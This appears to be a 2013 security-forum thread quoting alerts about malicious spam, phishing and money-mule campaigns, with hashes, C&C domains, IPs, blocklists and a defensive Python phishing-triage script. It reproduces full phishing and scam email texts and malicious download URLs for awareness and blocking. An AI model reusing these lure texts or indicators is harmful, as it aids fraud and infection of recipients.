Fake Payment Receipt Notification Email Messages - 2013 Oct 07
Fake Payment Confirmation Notification Email Messages - 2013 Oct 07
Fake Account Payment Notification Email Messages - 2013 Oct 07
Fake Commissions Invoice Email Messages - 2013 Oct 07
Fake Hotel Reservation Confirmation Email Messages - 2013 Oct 07
Fake Product Order Email Messages - 2013 Oct 07
Fake Bank Payment Transfer Notification Email Messages - 2013 Oct 07
Fake Financial Document Email Messages - 2013 Oct 07
Malicious Personal Pictures Attachment Email Messages - 2013 Oct 07
Fake Shipping Notification Email Messages - 2013 Oct 07
Fake Document Attachment Email Messages - 2013 Oct 07
Fake Payment Confirmation Email Messages - 2013 Oct 07
Fake Product Quote Request Email Messages - 2013 Oct 07
Fake Electronic Payment Cancellation Email Messages - 2013 Oct 07
Fake Bank Account Details Inquiry Email Messages - 2013 Oct 07
Fake Personal Picture Sharing Notification Email Messages - 2013 Oct 07
Fake Portuguese Personal Picture Notification Email Messages - 2013 Oct 07
Fake Order Shipment Tracking Information Email Messages - 2013 Oct 07
Fake Business Complaint Notification Email Messages - 2013 Oct 07
(More detail and links at the cisco URL above.)

:mad: :fear:

AplusWebMaster
2013-10-08, 14:24
FYI...

Fake Wells Fargo SPAM - malicious attachment / lasub-hasta .com
- http://blog.dynamoo.com/2013/10/fake-well-fargo-spam-comes-with.html
8 Oct 2013 - "This fake Wells Fargo spam is a retread of this one*, but comes with a slightly different attachment:
Date: Mon, 7 Oct 2013 19:56:29 +0100 [10/07/13 14:56:29 EDT]
From: "Harry_Buck@ wellsfargo .com" [Harry_Buck@ wellsfargo .com]
Subject: Documents - WellsFargo
Please review attached files.
Harry_Buck
Wells Fargo Advisors
817-487-2882 office
817-683-6287 cell Harry_Buck@ wellsfargo .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member
FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 ...

Attached is a ZIP file containing a malicious EXE file. The VirusTotal detection rate is a fairly healthy 27/48**. Automated analysis... shows that the malware tries to phone home to lasub-hasta .com on 205.251.152.178 (Global Net Access, US). A quick look at that server shows that it has several hundred sites on, most of which are probably legitimate... but there is a great deal of suspect activity*** on this server which you might want to take into account if you are thinking of -blocking- this IP."
* http://blog.dynamoo.com/2013/09/wells-fargo-important-documents-spam.html

** https://www.virustotal.com/en-gb/file/eab00b325890f6a92f9e4888b7f394732760d0ccf36095731a1b5764c6fa79d3/analysis/1381222163/

*** https://www.virustotal.com/en-gb/ip-address/205.251.152.178/information/
___

Spoofed APEC 2013 email mixes old threat tricks
- http://blog.trendmicro.com/trendlabs-security-intelligence/spoofed-apec-2013-email-mixes-old-threat-tricks/
Oct 8, 2013 - "... threat actors have found another high-profile political event to leverage their schemes. The APEC 2013 Summit – an annual meeting of 21 Pacific Rim countries – in Indonesia can be the perfect veil for their spoofed emails. The threat arrives as an email purportedly from “Media APEC Summit 2013” containing two attached Excel files. The sender, message and the recipients of the email lead us to believe that this threat is aimed at individuals who would be interested in the summit (both attendees and non-attendees).
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/apec-summit-email.jpg
... the email contains two attachments. Both are disguised as “APEC media list”, however only one of them (APEC Media List 2013 Part 1) was found malicious. The other, non-malicious file serves as a decoy document. Based on our analysis, the malware exploits an old Microsoft Office vulnerability (CVE-2012-0158*), an old vulnerability that was also exploited in other targeted attacks... This malware then triggers a series of multiple malware drops and connects to various command-and-control (C&C) servers. Once done, the exploit drops and executes the file dw20.t. The said file is a dropper, which drops another file in C:\Program Files\Internet Explorer\netidt.dll. This dropped file also communicates to specific C&C servers and sends/receives encrypted data containing system information and infection status. This allows netidt.dll to download the executable _dwr6093.exe. This malware is another dropper that drops and executes downlink.dll. This final dropper leads to the final payload (netui.dll, detected as BKDR_SEDNIT.SM) and is responsible for its automatic execution (by creating autostart registry entries). BKDR_SEDNIT.SM steals information via logging keystrokes and executes commands from its C&C servers. The malicious actors behind this threat can then use the malware to gather and exfiltrate important data, leading to serious repercussions to the targeted parties..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 - 9.3 (HIGH)
Last revised: 03/07/2013 - "... triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability"..."
___

Fake "Voicemail" SPAM ...
- http://www.threattracksecurity.com/it-blog/kuluoz-voicemail-spam-drops-signed-certificate-winwebsec/
Oct 7, 2013 - "... fake WhatsApp email messages leading to various forms of mobile infection. Over the last day or so, our Labs have noticed a shift into other realms – namely, Fake AV. Whenever we see Kuluoz, it is typically using compromised boxes to host payloads – and those payloads are usually Winwebsec and Medfos. Fake emails are the name of the game, and as you can see they run the full range of wedding invites, airline spam, DHL / Fedex notifications and more besides. In this case, we begin with the now familiar WhatsApp spam email messages:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/winwebsec0.jpg
Instead of links taking end-users to malicious mobile downloads, they’ll be taken to a .biz.ua URL offering up a Kuluoz.B executable file which will download WinWebSec onto the target PC. Winwebsec has been signed by a valid cert, which is increasingly becoming a problem where Malware is concerned. The Winwebsec variant is fairly recent, dating from mid to late August. It downloads Fareit and Ursnif, which are both infostealers (of course, the Fake AV – called Antivirus Security Pro – will try to convince end-users to pay up for non-existent infection removal. It will completely ignore the genuine infections dropped on the PC, but you wouldn’t expect anything less really).
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/winwebsec1.jpg
... At time of writing, Virustotal has the Kuluoz pegged at 16/48... VIPRE Antivirus will find it is detected as Trojan.Win32.Generic.pak!cobra. Fake voicemail messages are a great way for scammers to target individuals and corporations, especially if sent to less technologically inclined victims. Expect the payloads of these spam messages to keep changing, and be very wary of running any executable files sent via email – no matter how tempting the supposed message waiting for you is..."
___

Verizon Wireless Picture Messaging Spam
- http://threattrack.tumblr.com/post/63468757888/verizon-wireless-picture-messaging-spam
Oct 8, 2013 - "Subjects Seen:
No Subject
Typical e-mail details:
This message was sent using the Picture and Video Messaging service from Verizon Wireless!

Malicious File Name and MD5:
<random>Img_Picture.zip (0FF888E38099617CBD03451DA72F5FC4)
<random>Img_Picture.jpeg.exe
(67355A28A8EA584D0A08F17BE10E251E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f33ac38030657107b6232750e43bcf1f/tumblr_inline_mucv43J0sn1r6pupn.png
___

Mileage Reimbursement Form Spam
- http://threattrack.tumblr.com/post/63473640689/mileage-reimbursement-form-spam
Oct 8, 2013 - "Subjects Seen:
Annual Form - Authorization to Use Privately Owned Vehicle on State Business
Typical e-mail details:
All employees need to have on file this form STD 261 (attached). The original is retained by supervisor and copy goes to Accounting. Accounting need this form to approve mileage reimbursement.
The form can be used for multiple years, however it needs to re-signed annually by employee and supervisor.
Please confirm all employees that may travel using their private car on state business (including training) has a current STD 261 on file. Not having a current copy of this form on file in Accounting may delay a travel reimbursement claim.

Malicious File Name and MD5:
Form_<e-mail domain>.zip (00D3C33F37DEE0B3AB933C968BE8043A)
Form_20130810.exe
(6828091CBF4AACEC10195EDBFA804FA7)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/26e9269e0b0f01eb8c891d2c35692e8a/tumblr_inline_mucyp5HE2x1r6pupn.png

:mad: :fear:

AplusWebMaster
2013-10-09, 18:10
FYI...

Fake Business form SPAM / warehousesale .com .my
- http://blog.dynamoo.com/2013/10/annual-form-authorization-to-use.html
9 Oct 2013 - "This oddly-themed spam has a malicious attachment:
Date: Tue, 8 Oct 2013 11:49:49 -0600 [10/08/13 13:49:49 EDT]
From: Waldo Reeder [Waldo@ victimdomain .com]
Subject: Annual Form - Authorization to Use Privately Owned Vehicle on State Business
All employees need to have on file this form STD 261 (attached). The original is
retained by supervisor and copy goes to Accounting. Accounting need this form to approve
mileage reimbursement.
The form can be used for multiple years, however it needs to re-signed annually by
employee and supervisor.
Please confirm all employees that may travel using their private car on state business
(including training) has a current STD 261 on file. Not having a current copy of this
form on file in Accounting may delay a travel reimbursement claim.

There is a ZIP file attached which includes the victim's domain name as part of the filename. Inside is an executable file with an icon to make it look like a PDF file, and the date is encoded into the filename. VirusTotal detections are not bad at 25/48*. Automated analysis... shows an attempted connection to warehousesale .com .my hosted on 42.1.61.90 (Exa Bytes Network, Malaysia). There are no other sites on that server that I can see and I recommend that you -block- both the IP and domain as a precaution.
Recommended blocklist:
warehousesale .com .my
42.1.61.90"
* https://www.virustotal.com/en-gb/file/2c3c1cbe50fdeecf665faf00cadff094c08f49000c96b57983546c1db197038c/analysis/1381305964/
File name: Form_20130810.exe

- https://www.virustotal.com/en-gb/ip-address/42.1.61.90/information/
___

Fake GMail emails lead to pharmaceutical scams
- http://www.webroot.com/blog/2013/10/09/fake-4-missed-emails-gmail-themed-emails-lead-pharmaceutical-scams/
Oct 9, 2013 - "Pharmaceutical scammers are currently mass mailing tens of thousands of fake emails, impersonating Google’s GMail in an attempt to trick its users into clicking on the links found in the spamvertised emails. Once users click on them, they’re automatically exposed to counterfeit pharmaceutical items, with the scammers behind the campaign attempting to capitalize on the ‘impulsive purchase’ type of social engineering tactic typical for this kind of campaign.
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Email_Spam_Spamvertised_Fake_GMail_Pharmaceutical_Scams_01.png
Sample screenshot of the landing pharmaceutical scams page:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Email_Spam_Spamvertised_Fake_GMail_Pharmaceutical_Scams.png
... Landing URL: shirazrx .com – 85.95.236.188 – Email: ganzhorn@ shirazrx .com ... pharmaceutical scam domains are also known to have responded to the same IP (85.95.236.188)... This isn’t the first, and definitely not the last time pharmaceutical scammers brand-jack reputable brands in order to trick users into clicking on the links found in the fake emails, as we’ve already seen them brand-jack Facebook’s Notification System, YouTube, as well as the non-existent Google Pharmacy. Thanks to the (natural) existence of affiliate networks for pharmaceutical items, we expect that users will continue falling victim to these pseudo-bargain deals, fueling the growth of the cybercrime economy. Our advice? Never bargain with your health, spot the scam and report it."

- https://www.virustotal.com/en-gb/ip-address/85.95.236.188/information/

:mad: :fear:

AplusWebMaster
2013-10-10, 16:15
FYI...

Malware served up by Bad Bing Ads
- http://www.threattracksecurity.com/it-blog/sirefef-malware-served-bad-bing-ads/
Oct 10, 2013 - "We’re seeing our old friend “rogue ads in Bing” doing the rounds – should you go searching for “Youtube” and click on the rogue ad (in this case, the one in the bottom right hand corner under “Ads related to Youtube”) you’ll be taken to a site which redirects to an exploit.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/bingexploit1.png
The scammers behind this could well be targeting other keywords... The exploit attempts to drop Sirefef, which we’ve seen being used in malicious Bing adverts back in March 2013..."
___

Fake Payroll Intuit email
- http://security.intuit.com/alert.php?a=89
10/10/13 - "Here is a copy of the phishing email people are receiving. Be sure -not- to click any links in the email.

Dear,
We received your payroll on October 9, 2013 at 4:59 PM .
Attached is a copy of your Remittance. Please click on the attachment in order to view it.
Please note the deadlines and status instructions below:
If your payroll is received BEFORE 5 p.m., your Direct Deposit employees will be paid two (2) banking days from the date received or on your paycheck date, whichever is later.
If your payroll is received AFTER 5 p.m., your employees will be paid three (3) banking days from the date received or on your paycheck date, whichever is later.
YOUR BANK ACCOUNT WILL BE DEBITED THE DAY BEFORE YOUR CHECKDATE.
Funds are typically withdrawn before normal banking hours so please make sure you have sufficient funds available by 12 a.m. on the date funds are to be withdrawn.
Intuit must receive your payroll by 5 p.m., two banking days before your paycheck date or your employees will not be paid on time.
Intuit does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Sincerely,
Intuit Payroll Services
__
This is the end of the fake email.
Steps to Take Now:
Do -not- open the attachment in the email...
Delete the email..."
___

Fake 'Companies House' SPAM
- http://blog.dynamoo.com/2013/10/companies-house-phish.html
10 Oct 2013 - "This fake Companies House spam appears to be some sort of phishing attempt:
Date: Thu, 10 Oct 2013 11:57:31 +0300 [04:57:31 EDT]
From: Companies House [contact@ companieshouse .co .uk]
Subject: Compulsory Companies House WebFiling Update #90721
Compulsory Companies House WebFiling Update #90721
This is an important notice to inform you as a registered company to update your details.
This will make it easier to update our database and keep records of our company...

Screenshot: https://lh3.ggpht.com/-KaNlD25nUrA/UlambOUdY_I/AAAAAAAACDw/E6Hgxigjzlk/s1600/companies-house-1.png

The link in the email goes to [phish]www.misspanama .net/respaldo/ukcompany/CompaniesHouse.htm which asks only for a Company Name, email address and password.
> https://lh3.ggpht.com/-1wLNfJ2PxG8/Ulanw6MaEJI/AAAAAAAACD8/VSykobTiQn4/s1600/companies-house-2.png
Once the credentials have been harvested, the victim is sent to a genuine Companies House webpage at www.companieshouse .gov .uk/forms/introduction.shtml
> https://lh3.ggpht.com/-5V2piX6jidM/UlaoEJYJiPI/AAAAAAAACEE/M64-umwPBtc/s1600/companies-house-3.png
So, what is being harvested here? There seems to be no malware involved, so perhaps the bad guys are actually trying to hijack company identities for some evil purpose. It turns out that Companies House have a webpage all about this type of threat and recommend that you forward offending emails to phishing@companieshouse .gov .uk. Just remember.. sometimes phishers are after something a lot less obvious than your bank details!"

:mad: :fear:
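
The harvest-then-redirect pattern described in the Companies House write-up above, where the sender domain copies the brand name under a different suffix (companieshouse .co .uk instead of the genuine .gov.uk) and the form link points at an unrelated host, can be checked mechanically at the mail gateway. The following is an added example written for this thread; it is not code from the dynamoo post, from Companies House or from the forum. It assumes a single genuine domain for the brand (companieshouse.gov.uk), and the message it parses is a constructed copy of the quoted mail with a placeholder link host (example.net) standing in for the real phishing site:

```python
"""Brand-impersonation triage for a suspected phish (added example)."""
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Genuine domains per impersonated brand. Assumption for this example: only
# companieshouse.gov.uk is legitimate; the spam's companieshouse.co.uk is not.
BRAND_DOMAINS = {
    "companieshouse": {"companieshouse.gov.uk"},
}

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def squash(text):
    """Lower-case and drop non-alphanumerics so 'Companies House' == 'companieshouse'."""
    return re.sub(r"[^a-z0-9]", "", text.lower())


def brand_of(text):
    """Return the brand keyword mentioned in a display name, subject or domain, else None."""
    s = squash(text)
    for brand in BRAND_DOMAINS:
        if brand in s:
            return brand
    return None


def is_genuine(host, brand):
    """True when host is one of the brand's genuine domains or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS[brand])


def link_hosts(body):
    """Distinct link hosts in the body, in order of first appearance."""
    hosts = []
    for url in URL_RE.findall(body):
        host = urlparse(url).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def triage(raw):
    """Parse one RFC 5322 message and list brand/sender/link mismatches."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    display, addr = parseaddr(msg.get("From", ""))
    sender_domain = addr.rpartition("@")[2].lower()
    brand = brand_of(display) or brand_of(msg.get("Subject", "")) or brand_of(sender_domain)
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body else ""
    hosts = link_hosts(text)
    findings = []
    if brand:
        if not is_genuine(sender_domain, brand):
            # Brand name kept, suffix swapped (.co.uk for .gov.uk): a lookalike domain
            kind = "lookalike" if brand in squash(sender_domain) else "unrelated"
            findings.append(f"sender domain {sender_domain} is a {kind} domain for brand {brand}")
        for host in hosts:
            if not is_genuine(host, brand):
                findings.append(f"link host {host} is not a genuine {brand} domain")
    return {"brand": brand, "sender_domain": sender_domain,
            "link_hosts": hosts, "findings": findings}


# Constructed sample modelled on the mail quoted in the post. The link host is a
# placeholder under example.net, not the phishing site named in the write-up.
SAMPLE = b"""From: Companies House <contact@companieshouse.co.uk>
Subject: Compulsory Companies House WebFiling Update #90721
Content-Type: text/plain; charset=us-ascii

This is an important notice to inform you as a registered company to update your details.
Update now: http://www.phish.example.net/respaldo/ukcompany/CompaniesHouse.htm
"""

if __name__ == "__main__":
    for line in triage(SAMPLE)["findings"]:
        print("FLAG:", line)
```

Run as-is it prints two flags, one for the lookalike sender domain and one for the off-brand link host. Since the victim is forwarded to the genuine Companies House page after the form is submitted, nothing on the final page looks wrong to them; the sender/link mismatch before delivery is the signal worth automating.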

AplusWebMaster
2013-10-11, 13:22
FYI...

Fake Facebook App - Phishers Use Malware
- http://www.symantec.com/connect/fr/blogs/phishers-use-malware-fake-facebook-app
9 Oct 2013 - "Phishers frequently introduce -bogus- applications to add new flavor into their phishing baits... In this particular scam, phishers were trying to steal login credentials, but their means of data theft wasn’t with the phishing bait alone. Their ploy also used malware for harvesting users’ confidential information. The phishing site spoofed the login page of Facebook and was hosted on a free web hosting site.
> http://www.symantec.com/connect/sites/default/files/users/user-2935611/figure1_0.png
The phishing site boasted that the application would enable users to view a list of people who visited their profile page. The site offered two options to activate the fake app. The first option was by downloading software containing the malware and the second was by entering user credentials and logging into Facebook. A message on the phishing page encouraged users to download the software that would allegedly send notifications to the user when someone visited their Facebook profile. If the download button was clicked, a file download prompt appeared. The file contained malicious content detected by Symantec as Infostealer. On the other hand, if user credentials were entered, the phishing site -redirected- to a legitimate Facebook page... If users fell victim to the phishing site by entering their login credentials, the phishers would have successfully stolen their information for identity theft purposes..."
___

Twitter still being used by Hacks...
- http://blog.trendmicro.com/trendlabs-security-intelligence/twitter-still-being-used-by-shady-hackers/
Oct 10, 2013 - "... Twitter said it has 218 million monthly active users, three-quarters of which have accessed the site from a mobile device. It’s not a surprise that some of these users are malicious. What is uncommon is that some of these malicious accounts do try to “engage” with other accounts – even those of security vendors like Trend Micro... Recently, we came across four accounts that added the @TrendLabs Twitter account to various lists. This would not have been unusual, except -all- four accounts were clearly malicious:
Accounts/lists added:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/twitter-list.png
Upon further investigation, these accounts led to more malicious sites offering a variety of hacking tools targeting sites like Facebook and Twitter, as well as a scam site offering free iPhone 5s...
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/twitter-tool.jpg
It’s highly likely that these malicious sites are scam sites, offering none of the supposed “tools” that are on offer. Cybercriminals are not below stealing from other would-be online crooks and attackers as well. Unfortunately, this is not the first (or the last) threat that we can encounter on popular social networking sites. Previously, incidents like survey scams, rogue apps, and other threats were frequent, although recent improvements by these sites were able to keep these threats at bay. However, as the popularity of mobile devices grew, cybercriminals have found a new platform to use in their schemes. Just recently, we found a fake Facebook mobile page* that asks users to disclose credit card details. Cybercriminals may either sell or use these to initiate unauthorized transactions. We advise would-be “curious” users to avoid these sites and profiles completely, and if possible to report these accounts to site administrators (if possible, using the automated block/report features of these services)..."
* http://blog.trendmicro.com/trendlabs-security-intelligence/fake-facebook-mobile-page-steals-credit-card-details/

:mad: :fear::fear:

AplusWebMaster
2013-10-14, 19:42
FYI...

Phish take to the Skies
- http://www.threattracksecurity.com/it-blog/flying-blue-phish-takes-skies/
Oct 14, 2013 - "FlyingBlue, the frequent flyer program of Air France and KLM, are sending emails to members warning of a phishing campaign...
“Some Flying Blue members report receiving an e-mail in which they are advised to secure their “Air France-KLM account” by clicking on a link and logging into the “secured Flying Blue network”. This e-mail was not sent by AIR FRANCE, KLM or Flying Blue. Do not log in using this link. Please make sure that you only log into your Flying Blue account if you are in the trusted Flying Blue environment. If you clicked on a link in the fake Flying Blue e-mail, we advise you to check your account now. If you cannot access your account, please contact the Flying Blue Service Centre.”
You can see what one of the phish pages looked like, courtesy of Urlquery(dot)net*.
“We need to verify your email address to confirm you are the owner of this account. In order to protect your privacy, we will never store your password or send emails without your consent”
It seems likely they were after email accounts at a minimum and email & airmiles accounts at a maximum, with airmiles being particularly useful to scammers the World over. We don’t need to tell you how bad it would be to have your email address compromised (or maybe we do!) but many would overlook the significance of having their airmiles targeted. Whether you collect them for business, pleasure or both you should be cautious of -any- emails asking you to login to confirm details. If in doubt, always type the URL into your browser and visit a site directly rather than click blindly and hope for the best. You can see a little more information about the scam currently in circulation by reading the notice on the Flying Blue homepage**..."
* https://urlquery.net/report.php?id=6411611

** http://www.flyingblue.com/news/1603/warning-beware-of-phishing-attempts-in-fake-flying-blue-e-mails.html

> https://urlquery.net/screenshot.php?id=6411611

- https://www.virustotal.com/en/ip-address/5.9.87.109/information/

- http://google.com/safebrowsing/diagnostic?site=AS:24940
___

Fake T-Mobile themed emails ...
- http://www.webroot.com/blog/2013/10/14/spamvertised-t-mobile-picture-id-typemms-themed-emails-lead-malware/
Oct 14, 2013 - "The cybercriminals behind last week’s profiled fake T-Mobile themed email campaign* have resumed operations, and have just spamvertised another round of tens of thousands of malicious emails impersonating the company, in order to trick its customers into executing the malicious attachment, which in this case is once again supposedly a legitimate MMS notification message. Detection rate for the spamvertised attachment: MD5: 8a9abe065d473da9527fdf08fb55cb9e ** ... Trojan.DownLoader9.22851; UDS:DangerousObject.Multi.Generic
Once executed, the sample creates the following Mutexes on the affected hosts:
CTF.TimListCache.FMPDefaultS-1-5-21-1547161642-507921405-839522115-1004MUTEX.DefaultS-1-5-21-1547161642-507921405-839522115-1004 / ShimCacheMutex / 85485515
It then (once again) phones back to networksecurityx.hopto .org. The most recent MD5 (MD5: 014543ee64491bac496fabda3f1c8932***) that has phoned back to the same C&C server (networksecurityx.hopto .org) is also known to have phoned back to dahaka.no-ip .biz (89.136.186.200)..."
* https://www.webroot.com/blog/2013/10/02/t-mobile-mms-message-arrived-themed-emails-lead-malware/

** https://www.virustotal.com/en/file/6769e4686aa701956d90a5e850d1f795a2db5c71f6a94c410d40b6596aee09ad/analysis/

*** https://www.virustotal.com/en/file/556140429ad90142a2f29ffdd63d68378a38f9c7b5dbf74ae3b08c4f825f1f3a/analysis/

:mad: :fear:

AplusWebMaster
2013-10-15, 19:29
FYI...

Fake USPS SPAM / Label_ZFRLOADD5PGGZ0Z_USPS.zip
- http://blog.dynamoo.com/2013/10/usps-spam-labelzfrloadd5pggz0zuspszip.html
15 Oct 2013 - "This fake USPS spam has a malicious attachment:
Date: Tue, 15 Oct 2013 09:36:02 -0500 [10:36:02 EDT]
From: USPS Express Services [service-notification@ usps .com]
Subject: USPS - Missed package delivery
Notification
Our company's courier couldn't make the delivery of package.
REASON: Postal code contains an error.
DELIVERY STATUS: Sort Order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: USPSZFRLOADD5PGGZ0Z
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.

There is an attachment Label_ZFRLOADD5PGGZ0Z_USPS.zip which contains a malicious executable Label_101513_USPS.exe (note the date encoded into the filename). VirusTotal shows just 4/46* vendors detect it at present. Automated analysis... shows an attempted communication with traderstruthrevealed .com on 103.8.27.82 (SKSA Technology, Malaysia). There is also another email using this format with the same payload.
Recommended blocklist:
103.8.27.82
traderstruthrevealed .com"
* https://www.virustotal.com/en-gb/file/b0a7f2a03b6718ed522dc3bc63ee43e31823132ba69ea5e7b62740c7d38d0242/analysis/1381850132/

- https://www.virustotal.com/en-gb/ip-address/103.8.27.82/information/
___

Fake Intuit SPAM / payroll_report_147310431_10112013.zip
- http://blog.dynamoo.com/2013/10/payroll-received-by-intuit-spam.html
15 Oct 2013 - "This fake Intuit spam comes with a malicious attachment:
Date: Tue, 15 Oct 2013 16:20:40 +0000 [12:20:40 EDT]
From: Intuit Payroll Services [IntuitPayrollServices@ payrollservices.intuit .com]
Subject: Payroll Received by Intuit
Dear, [redacted]
We received your payroll on October 11, 2013 at 4:41 PM .
Attached is a copy of your Remittance. Please click on the attachment in order to view it.
Please note the deadlines and status instructions below: If your payroll is received
BEFORE 5 p.m., your Direct Deposit employees will be paid two (2) banking days from the
date received or on your paycheck date, whichever is later. If your payroll is received
AFTER 5 p.m., your employees will be paid three (3) banking days from the date received
or on your paycheck date, whichever is later. YOUR BANK ACCOUNT WILL BE DEBITED THE DAY
BEFORE YOUR CHECKDATE. Funds are typically withdrawn before normal banking hours so
please make sure you have sufficient funds available by 12 a.m. on the date funds are to
be withdrawn. Intuit must receive your payroll by 5 p.m., two banking days before your
paycheck date or your employees will not be paid on time. Intuit does not process
payrolls on weekends or federal banking holidays. A list of federal banking holidays can
be viewed at the Federal Reserve website. Thank you for your business.
Sincerely, Intuit Payroll Services...

The attachment is payroll_report_147310431_10112013.zip which in turn contains payroll_report_10112013.exe (note the date is encoded into those files). That executable currently has a detection rate of 9/46* at VirusTotal. Automated analysis shows that it attempts to make a connection to mtfsl .com on 184.22.215.50 (Network Operations Center, US). Blocking those temporarily may give some protection against any additional threats using that server."
* https://www.virustotal.com/en/file/b2b5f9ea3202520e4a1c75b2500dc200cda9158034d83bd98963ac93e4681aff/analysis/1381861232/

- https://www.virustotal.com/en/ip-address/184.22.215.50/information/

:mad: :fear:

AplusWebMaster
2013-10-17, 04:24
FYI...

Fake Pinterest SPAM - alenikaofsa .ru
- http://blog.dynamoo.com/2013/10/your-facebook-friend-andrew-hernandez.html
16 Oct 2013 - "This fake Pinterest spam leads to a malicious download on alenikaofsa .ru:
Date: Wed, 16 Oct 2013 12:03:11 -0300 [11:03:11 EDT]
From: Pinterest [pinbot@ pinterest .biz]
Subject: Your Facebook friend Andrew Hernandez joined Pinterest
A Few Updates...
[redacted]
Andrew Hernandez
Your Facebook friend Andrew Hernandez just joined Pinterest. Help welcome Carol to the community!
Visit Profile
Happy pinning! ...

Screenshot: https://lh3.ggpht.com/-1wTZhiRwP5o/Ul7ovSINeHI/AAAAAAAACGY/N8QUzfcsIhw/s1600/pinterest2.png

... The link in the email goes through a legitimate hacked site and then ends up on a fake browser download page (report here*) that attempts to download [donotclick]alenikaofsa .ru:8080/ieupdate.exe which has a VirusTotal detection rate of just 1/48** (only Kaspersky detects it.. again)... alenikaofsa .ru is registered to the infamous Russian "private person" and is hosted on the following IPs:
62.75.246.191 (Intergenia AG, Germany)
69.46.253.241 (RapidDSL & Wireless, US)
The domain alionadorip .ru is also hosted on these IPs. What's interesting is that 69.46.253.241 was seen here months ago, which makes this look like the unwelcome return of the RU:8080 gang after a long absence.
Recommended blocklist:
62.75.246.191
69.46.253.241
alenikaofsa .ru
alionadorip .ru
Footnote:
The malware page uses a similar script to that used here*** although with the rather cheeky comment
// It's "cool" to let user wait 2 more seconds :/ ..."
* http://urlquery.net/report.php?id=6856407

** https://www.virustotal.com/en/file/807f43d9649976a3ac7bc4b2506947ccedea2235eb80ac69a8246fb2b8c1a1b4/analysis/1381951170/

*** http://blog.dynamoo.com/2013/09/aicpa-spam-children-bicyclenet.html
___

Fake LinkedIn SPAM / Contract_Agreement_whatever.zip
- http://blog.dynamoo.com/2013/10/linkedin-spam-contractagreementwhatever.html
16 Oct 2013 - "This fake LinkedIn spam has a malicious attachment:
Date: Wed, 16 Oct 2013 11:57:55 -0600 [13:57:55 EDT]
From: Shelby Gordon [Shelby@ linkedin .com]
Attached is your new contract agreements.
Please read the notes attached, then complete, sign and return this form.
Shelby Gordon
Contract Manager
Online Division - LinkedIn
Shelby.Gordon@ linkedin .com ...

The attachment has the format Contract_Agreement_recipientname.zip and in turn contains a malicious executable Contract_Agreement_10162013.exe (note the date encoded into the filename). VirusTotal detections are 10/48*. Automated analysis tools... show an attempted connection to miamelectric .com on 209.236.71.58 (Westhost, US). I recommend that you block outbound traffic to that particular domain."
* https://www.virustotal.com/en/file/67762ad4b6bdf79eb52256e699a1409a1671c4581dcdaea70704c6c485e93797/analysis/1381954740/
___

Fake job offer - Atlantics Post LLC
- http://blog.dynamoo.com/2013/10/atlantics-post-llc-fake-job-offer.html
16 Oct 2013 - "A bit of Money Mule recruiting that isn't really trying very hard..
Date: Wed, 16 Oct 2013 14:54:34 -0300 [13:54:34 EDT]
From: Atlantics Post [misstates7@ compufort .com]
Subject: Career with Atlantics Post LLC
Atlantics Post LLC is now hiring for a Shipping Clerk. If You are young, enthusiastic person. Looking for a great job opportunity with a stable in come this job is for you.
Duties:
Receive packages at workplace (out of home possition);
Transfer the packages to our business partners nationwide;
Keeping accurate records of operations and report them
Requirements:
- Thorough knowledge of quality improvement techniques and experience with process and service delivery improvement.
- Strong ability to analyze, organize and simplify complex processes and data.
- Exceptional attention to detail.
- Considerable experience with data reporting systems.
- Leisure business experience an asset.
- Flexible, adaptable to change, and resourceful in the face of shifting priorities and demands ...
Originating IP is 181.165.70.97 in Argentina. Avoid."

:fear: :mad:

AplusWebMaster
2013-10-17, 12:45
FYI...

Flash exploits, Fake browser updates - Mass iFrame injection campaign...
- http://www.webroot.com/blog/2013/10/17/mass-iframe-injection-campaign-leads-adobe-flash-exploits/
Oct 17, 2013 - "We’ve intercepted an ongoing malicious campaign, relying on injected/embedded iFrames at Web sites acting as intermediaries for successful client-side exploits to take place... a social engineering campaign pushing fake browser updates... iFrame URL: mexstat210 .ru – 88.198.7.48 ... Sample detection rate for the malicious script: MD5: efcaac14b8eea9b3c42deffb42d59ac5 * ... Trojan-Downloader.JS.Expack.sn; Trojan:JS/Iframe.BS ... malicious MD5s are also known to have been hosted on the same IP (88.198.7.48)... Client-side exploits serving URL: urkqpv.chinesenewyeartrendy .biz:39031/57e2a1b744927e0446aef3364b7554d2.html – 198.50.225.114
Domain name reconnaissance: chinesenewyeartrendy .biz - 46.105.166.96 known to have responded to the same IP is also appearancemanager .biz ...
... the iFrame injected/embedded URL includes a secondary iFrame pointing to a, surprise, surprise, Traffic Exchange network. Not surprisingly, we also identified a related threat that is currently using the same infrastructure as the official Web site of the Traffic Exchange.
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Mass_iFrame_Injection_Traffic_EShop_Buy_Purchase_Traffic_Exploits_Malware.png
